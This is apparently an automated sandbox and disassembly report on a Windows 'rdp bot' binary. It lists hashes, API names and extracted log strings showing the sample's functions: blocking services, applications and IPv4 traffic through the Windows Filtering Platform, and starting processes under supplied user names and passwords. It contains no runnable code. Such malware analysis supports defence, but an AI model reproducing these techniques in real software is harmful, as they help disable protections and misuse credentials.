                                                                                                                                                  • Instruction ID: 79158fbff9acfc0573b4fcbc5ea5cc2bb68f1730400597839d8745dfef2ca5b8
                                                                                                                                                  • Opcode Fuzzy Hash: c4a5d119b8e46db3d6d484353cd613a654445c2d338f2979c9958e34502116e4
                                                                                                                                                  • Instruction Fuzzy Hash: 87A1A263A3D68681EA20AB05E4447B9A771EF48F94FCC4032DD8D47785DE6CE585C3A0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                                                                                                                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                                                                                                                  • API String ID: 493744553-3317923414
                                                                                                                                                  • Opcode ID: 28ad85c4949268e3a4ef3da6e723452246f6a5b39becbd9d33f0bbc3e033489c
                                                                                                                                                  • Instruction ID: 6f3e4f6a41456a249751ccf1d793553ed46719b096b50e47cbef5fa5e6fafdc8
                                                                                                                                                  • Opcode Fuzzy Hash: 28ad85c4949268e3a4ef3da6e723452246f6a5b39becbd9d33f0bbc3e033489c
                                                                                                                                                  • Instruction Fuzzy Hash: AB518F3263CBC285E7709B11E4443AAB760FB88B54F804135DA8C87B98EF7ED549CB91

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                                                                                                                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                                                                                                                  • API String ID: 493744553-3317923414
                                                                                                                                                  • Opcode ID: 811c73c2c255be6a266979c2ff7e8de6f342bbf2b98cf4093f3602435aca306e
                                                                                                                                                  • Instruction ID: 102859af8c13ebdb38cdbb6f26cec7333b5d6591606db7f0c3c8c47eaaebf265
                                                                                                                                                  • Opcode Fuzzy Hash: 811c73c2c255be6a266979c2ff7e8de6f342bbf2b98cf4093f3602435aca306e
                                                                                                                                                  • Instruction Fuzzy Hash: 41518F3263CBC285E7709B11E4443AAB760FB88B54F804135DA8C87B99EF7ED549CB91

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                                                                                                                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                                                                                                                  • API String ID: 493744553-3317923414
                                                                                                                                                  • Opcode ID: bf0049cc36aa2b87156958a37f5100f470e96f61e41f2cae54f4d89468e99936
                                                                                                                                                  • Instruction ID: c9c4b1b90d6caa3d81a261dcd968fb8e867bacbdfbae152599450a2ff76112c0
                                                                                                                                                  • Opcode Fuzzy Hash: bf0049cc36aa2b87156958a37f5100f470e96f61e41f2cae54f4d89468e99936
                                                                                                                                                  • Instruction Fuzzy Hash: 4651703263CBC285E7709B11E4443AAB760FB88B54F804135DA8C87B98EF7DD549CB91

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                                                  • API String ID: 1004003707-3780280517
                                                                                                                                                  • Opcode ID: 73da1e0966c3561dd717aab4f139a3398c39c780c5d8b23f88eacfb16f54bf38
                                                                                                                                                  • Instruction ID: f13f75907180343ba0aedb897f19438c610a7dbce810494eabdff42439530eac
                                                                                                                                                  • Opcode Fuzzy Hash: 73da1e0966c3561dd717aab4f139a3398c39c780c5d8b23f88eacfb16f54bf38
                                                                                                                                                  • Instruction Fuzzy Hash: 8D41F8B3E3868791EB60AB40E8407F4A760FF48B58FD84136DA4D46595DF7CA689C3A0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  • API String ID: 1004003707-386092548
                                                                                                                                                  • Opcode ID: 44ee8d190fb84950133145d9770a66678910dea851f0071a126621abf7bb8b0c
                                                                                                                                                  • Instruction ID: 0ccb1a98d09976873fc4fe8622ec495f12a6c209b6be513b97aabc6296400761
                                                                                                                                                  • Opcode Fuzzy Hash: 44ee8d190fb84950133145d9770a66678910dea851f0071a126621abf7bb8b0c
                                                                                                                                                  • Instruction Fuzzy Hash: 47413263A385C795FA20AB50E8407B4A7A0FF48B58FD84036D94D0A595DF7CA9C9D3E0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                                                                                                  • API String ID: 2918714741-1670302297
                                                                                                                                                  • Opcode ID: 48d8c4aec0c11063c26797bf0765ef4c66b22d52fb4a92b42e2fbd3b3769492f
                                                                                                                                                  • Instruction ID: 01f42dc098a6b3ee798924f8336bb29fc473234c4c1c6b07a4f66498d72d5f86
                                                                                                                                                  • Opcode Fuzzy Hash: 48d8c4aec0c11063c26797bf0765ef4c66b22d52fb4a92b42e2fbd3b3769492f
                                                                                                                                                  • Instruction Fuzzy Hash: F9219163A3868696E721AF15EC40BAAB770FB48BA4FC44032EE4C47654DF7CD845C7A0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1
                                                                                                                                                  • API String ID: 513531256-1839485796
                                                                                                                                                  • Opcode ID: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                                                                                                                                                  • Instruction ID: 94af9f17a1bb79f82b07933dda033e3a43f061baa535f94c4bce15234776973c
                                                                                                                                                  • Opcode Fuzzy Hash: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                                                                                                                                                  • Instruction Fuzzy Hash: 3C416F23A3868186F320BB12E8517AAA360FB8CFA0FC00035DA4D47795DF2CE585C7E0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DestroyEnumFwpmHandle0Providerwcscmp
                                                                                                                                                  • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
                                                                                                                                                  • API String ID: 1522850966-2029202777
                                                                                                                                                  • Opcode ID: fa74e2cb3a6eef84e7a0136588957558bd5e6b714ed79ae53c059174fd424a91
                                                                                                                                                  • Instruction ID: 1ef6549a34dbcaa6c96747777b1acfc211d425775e7fd9620379512cd1626578
                                                                                                                                                  • Opcode Fuzzy Hash: fa74e2cb3a6eef84e7a0136588957558bd5e6b714ed79ae53c059174fd424a91
                                                                                                                                                  • Instruction Fuzzy Hash: 8E517326638BC185F7609B16F5407AAB3A6FB88B94F808135DA8D4BB59EF3DD440C7D0
                                                                                                                                                  APIs
                                                                                                                                                  • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,000001EFE9DD14D0,?,00007FF7757214B4,?,?,00000001,00007FF7757214D2), ref: 00007FF775729701
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close0EngineFwpmwcscmp
                                                                                                                                                  • String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
                                                                                                                                                  • API String ID: 4239307310-774261742
                                                                                                                                                  • Opcode ID: c8ff5025d215534188b5837bc80f516c77452d0dc218e8ab1b112ece21252ef0
                                                                                                                                                  • Instruction ID: fa9c149f4510b5b7406283bd049a0e666fa9e2d9dc02e8f95a580b3bae06d1bd
                                                                                                                                                  • Opcode Fuzzy Hash: c8ff5025d215534188b5837bc80f516c77452d0dc218e8ab1b112ece21252ef0
                                                                                                                                                  • Instruction Fuzzy Hash: E2316153B3C64341FA50BB65A5902BA92B1DF4DBD0FD84031EA0E8B796EE5CD98583E0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                                                  • API String ID: 1799206407-4111913120
                                                                                                                                                  • Opcode ID: dda27c62fac4cd84eb860d51178331786ae83887d0c1dce0a6688692ad44cf8e
                                                                                                                                                  • Instruction ID: 3ac2228833613055456a2c6f11d22446d8461d9e32dc83d163d4a55d95f7844c
                                                                                                                                                  • Opcode Fuzzy Hash: dda27c62fac4cd84eb860d51178331786ae83887d0c1dce0a6688692ad44cf8e
                                                                                                                                                  • Instruction Fuzzy Hash: 8421B852E3C4C782FB24679A9444379A161EF08F1AFE0C537D14F89298DD1DFA8552E2
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 97cf023455eb3308a9bc5fd03e36ddc4e0876cad0f0bd96d056d2edce359639a
                                                                                                                                                  • Instruction ID: 40d1a4c7d97e419247a8d595e0a520ad134224faeb0172a65fdf8bfa965614dc
                                                                                                                                                  • Opcode Fuzzy Hash: 97cf023455eb3308a9bc5fd03e36ddc4e0876cad0f0bd96d056d2edce359639a
                                                                                                                                                  • Instruction Fuzzy Hash: 99F08662A3C69381FA11B756BC005B5A261BF0CFE0F944031DD4C07794EE2DDD46C3A0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                                                  • Opcode ID: 432cc5b08a59ed410987009eed26220de00fd652b8c5e43ab199aeb58c82218e
                                                                                                                                                  • Instruction ID: be50c8b246e18550571358c728ecb2dbb3bfc769d8a3c1a6a7a62c979cf6ff2e
                                                                                                                                                  • Opcode Fuzzy Hash: 432cc5b08a59ed410987009eed26220de00fd652b8c5e43ab199aeb58c82218e
                                                                                                                                                  • Instruction Fuzzy Hash: 4DF06D53A3C74385FA247B59948017897B1FF4DF54FC09431C44EC6296DE2DE84583A0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                   • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction ID: 51be8a490e1e08e4a3f5164ce5822924aa47bcad63ebcc087115975e6d315b41
                                                                                                                                                  • Opcode Fuzzy Hash: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction Fuzzy Hash: 18F05423F3824741F962BB05B8417B991526F89B71F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                   • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction ID: 48b59ad65841c59f8b884ad3730cd0292ec52fa8aee3208cf21cee5466b6fd3f
                                                                                                                                                  • Opcode Fuzzy Hash: a7b978a7e4832d4bb202c2f2260062eca19eca3da90641ae14189d9ddb797fc6
                                                                                                                                                  • Instruction Fuzzy Hash: 73F05423F3824741F962BB0578417B991526F89B76F8945358D5C4A6C1ED3E598382A0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                   • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction ID: 1530a1fb54a4a4607d96658e83b298e5d89d7ec585c19e5fa60623e2f43929cf
                                                                                                                                                  • Opcode Fuzzy Hash: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction Fuzzy Hash: D0F05423F3824741F962BB0578427B991526F89B75F8945358D5C4B6C1DD3E598382A0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                   • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                                                                                                                                                  • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                                                                                                                                                  • API String ID: 1842180197-3127737957
Similarity
• API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
